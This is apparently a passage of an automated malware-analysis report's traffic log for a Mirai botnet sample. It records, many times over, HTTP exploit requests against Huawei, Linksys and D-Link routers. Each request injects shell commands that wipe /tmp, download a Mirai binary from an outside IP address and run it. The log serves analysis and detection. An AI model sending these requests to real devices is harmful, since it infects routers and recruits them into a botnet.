70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
